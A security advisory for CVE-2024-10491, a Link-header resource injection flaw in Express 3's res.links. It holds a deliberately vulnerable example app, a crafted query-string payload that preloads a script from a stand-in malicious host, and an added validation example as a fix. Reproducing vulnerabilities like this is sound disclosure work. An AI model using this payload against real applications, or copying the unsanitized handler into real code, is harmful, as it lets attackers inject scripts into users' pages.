CVE-2024-10491

Resource Injection
Affects: Express >=3.0.0-alpha1 <=3.21.2
Patch Available
This vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs.

Overview

Express is a minimal and flexible Node.js web application framework that provides a robust set of features for web and mobile applications.

A Resource Injection vulnerability (CVE-2024-10491) has been identified in the Express response.links function: when unsanitized data is passed to it, arbitrary resources can be injected into the Link header. The issue arises from improper sanitization of Link header values, where a combination of characters such as commas (,), semicolons (;) and angle brackets (< >) lets an attacker terminate the intended link entry and append further entries that preload resources of their choosing. This is especially relevant when the value comes from a dynamic parameter such as a query string.

Per MITRE: Resource Injection happens when the application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.

This issue affects Express versions 3.0.0-alpha1 to 3.21.2.

Details

Module Info

Steps To Reproduce

  • Create an Express application that passes a value taken from a query parameter straight to res.links:
var express = require('express');
var app = express();

// Vulnerable: req.query.resource reaches the Link header without any sanitization
app.get('/', function (req, res) {
  res.links({preload: req.query.resource});
  res.send('ok');
});

app.listen(3000);

  • Send a specially-crafted value so that multiple Link header entries are set. For example:
// note how the query param uses > and , to close the intended entry and < to open
// a new one pointing at an arbitrary resource
const maliciousQueryParam = '?resource=http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';

// global fetch is available in Node.js 18 and later
const url = `http://localhost:3000/${maliciousQueryParam}`;
fetch(url);

  • The response now carries multiple Link header entries, only the first of which was intended:
<http://api.example.com/users?resource=>; rel="preload", <http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com>; rel="preload"
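
The application-level defence a practitioner would want, as an added example that is not part of this advisory or of Express's own code: validate the value before it ever reaches res.links. formatLinkHeader reproduces the header assembly visible in the output above (formatting assumed for illustration), validatePreloadUrl is a hypothetical allowlist check, and api.example.com is the assumed allowed host.

```javascript
// Added example (not from the advisory or Express): shows why the advisory's
// unsanitized value yields extra Link entries and one way to validate the
// value before it reaches res.links().

// Mirrors how the advisory's output joins entries: each value wrapped in <>,
// a rel parameter, entries separated by ", " (formatting assumed for illustration).
function formatLinkHeader(links) {
  return Object.keys(links)
    .map((rel) => '<' + links[rel] + '>; rel="' + rel + '"')
    .join(', ');
}

// Hypothetical allowlist check: absolute http(s) URL, host on the allowlist,
// and none of the characters that delimit Link entries (< > , ; " CR LF).
function validatePreloadUrl(value, allowedHosts) {
  if (typeof value !== 'string' || /[<>,;"\r\n]/.test(value)) return null;
  let parsed;
  try {
    parsed = new URL(value);
  } catch (e) {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  if (!allowedHosts.includes(parsed.host)) return null;
  return parsed.href;
}

// One "<...>" group per Link entry.
function countLinkEntries(header) {
  return (header.match(/<[^>]*>/g) || []).length;
}

// Constructed inputs: the advisory's payload (as Express sees it after URL
// decoding) and a benign value; api.example.com is the assumed allowed host.
const INJECTED = 'http://api.example.com/users?resource=>; rel="preload", '
  + '<http://api.malicious.com/1.js>; rel="preload"; as="script", <http:/api.example.com';
const BENIGN = 'http://api.example.com/users?resource=1';
const ALLOWED_HOSTS = ['api.example.com'];

// Vulnerable path: the value is used as-is, so one preload becomes three entries.
function vulnerableHeader(value) {
  return formatLinkHeader({ preload: value });
}

// Hardened path: null means "omit the header"; otherwise exactly one entry.
function hardenedHeader(value) {
  const safe = validatePreloadUrl(value, ALLOWED_HOSTS);
  return safe === null ? null : formatLinkHeader({ preload: safe });
}
```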

Proof Of Concept

A full reproduction with code similar to the above can be found here:

Express resource injection vulnerability POC

Credits

  • Abze (finder)

Mitigation

Express 3 has reached End-of-Life and will not receive any updates to address this issue. For more information, see here.

Users of the affected components should apply one of the following mitigations:

  • Migrate affected applications away from Express 3.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Vulnerability Details
ID: CVE-2024-10491
Project Affected: Express
Versions Affected: >=3.0.0-alpha1 <=3.21.2
Published date: October 29, 2024
Fix date (approximate): October 29, 2024
Fixed in:
Severity: Medium
Category: Resource Injection